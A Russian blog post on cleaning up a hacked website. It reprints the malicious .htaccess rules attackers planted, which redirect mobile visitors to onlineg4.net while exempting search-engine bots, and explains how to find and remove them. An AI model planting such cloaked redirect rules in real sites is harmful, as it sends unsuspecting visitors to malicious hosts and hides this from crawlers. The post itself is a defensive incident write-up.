29.03.2015
Категории: Исследования

Ваш сайт взломали! Как найти и устранить беду

Итак, что мы имеем?

В поиске Яндекса этому сайту стала приписываться вот такая надпись:

Сайт может угрожать безопасности вашего компьютера или мобильного устройства

При переходе на сайт ничего страшного не происходит. Это потому что вирус или скорее дор ориентирован на мобильные устройства и планшеты. И если зайти на сайт с какого нибудь смартфона, то вас перекинут на какой-то левый сайт, в данном случае, это сайт onlineg4.net.

Вот такой код залили злоумышленники в файлик .htaccess на хостинге:

RewriteCond   %{HTTP_USER_AGENT} (android | midp | j2me | symbian | series\ 60 | symbos | windows\ mobile | windows\ ce | ppc | smartphone | blackberry | mtk | bada | windows\ phone) [NC]

RewriteCond   %{HTTP_USER_AGENT} !(accoona | ia_archiver | antabot | ask\ jeeves | baidu | dcpbot | eltaindexer | feedfetcher | gamespy | gigabot | googlebot | gsa-crawler | grub-client | gulper | slurp | mihalism | msnbot | worldindexer | ooyyo | pagebull | scooter | w3c_validator | jigsaw | webalta | yahoofeedseeker | yahoo!\ slurp | mmcrawler | yandexbot | yandeximages | yandexvideo | yandexmedia | yandexblogs | yandexaddurl |
yandexfavicons | yandexdirect | yandexmetrika | yandexcatalog | yandexnews | yandeximageresizer)   [NC]

RewriteRule   (.*)   http://onlineg4.net/u/9024   [L,R=302]

Тут не сложно было догадаться и найти его, как правило такой вредоносный редирект ставят в начале файла. Его можно с легкостью удалить и писать в Яндекс о том, что теперь с сайтом все в порядке и его стоит исключить из черного списка.

Более того, хочу сказать, что если у вас или ваших посетителей будет установлен антивирус Касперского, то ваш сайт еще поместят в черный список баз Касперского. После очистки сайта стоит еще писать в тех.поддержку Касперского с просьбой удалить сайт из их черного списка, а то пользователи никогда не попадут на ваш сайт.

Вот такой вот случай произошел, скажу он не редкость и, как правило, его легко устранить. Достаточно элементарных знаний кода:

  • просматриваем файлик .htaccess, который лежит в корне вашего сайта;
  • ищем в нем, как правило в начале, домен какого-то левого сайта, к которому вы не имеете отношения;
  • ищем слова похожие на android | midp | j2me | symbian | series\ 60 | symbos | windows\ mobile | windows\ ce | ppc | smartphone | blackberry | mtk | bada | windows\ phone, то есть это с каких операционных систем люди будут перенаправляться на левый сайт;
  • ищем название ботов gamespy | gigabot | googlebot | gsa-crawler | grub-client | gulper | slurp | mihalism | msnbot | worldindexer | ooyyo | pagebull | scooter | w3c_validator | jigsaw | webalta | yahoofeedseeker | yahoo;
  • и самое последнее, ищем 302 редирект, потому что ставят именно его, не знаю с чем это связано, может они верят, что 302 редирект — это временный редирект.

Вот так можно выявить взлом сайта. Удачи и защищайте свои сайты от коварных злоумышленников.

Рекомендую почитать

Отзыв о сервисе Топвизар Привет, сегодня мне довелось оценить все прелести сервиса по оценке эффективности поискового продвижения Топвизар. В итоге я написал этот отзыв Дан...
Разговор о программистах на вебинаре Повышение эфф... Привет! Сегодня посетил второй вебинар Леонида и опять мне довелось поговорить с одним слушателем. Разговор зашел о программистах Сегодня на втором...
Методика определения работают ли ссылки по запросу... Привет, друзья! Сегодня хочу написать свое мнение почему алгоритм определения работают ли ссылки по запросу. Итак, поехали… Метод определения СНСС ...
Новый фильтр Яндекса АГС Сегодня кратко, но по делу хочется высказаться по новому фильтру АГС у Яндекса. Я провел мини-исследование Данный материал является моим личным м...
Продолжение истории с тестированием SerpParser... Итак я остановился на куче ошибок и багов в программе, сегодня хочу продолжить эту эпопею В предыдущем отзыве я писал, что тестирую SerpParser и со...

Хотите получать
мои статьи
почтой?

Адреса электронной почты не разглашаются и не предоставляются третьим лицам для коммерческого или некоммерческого использования.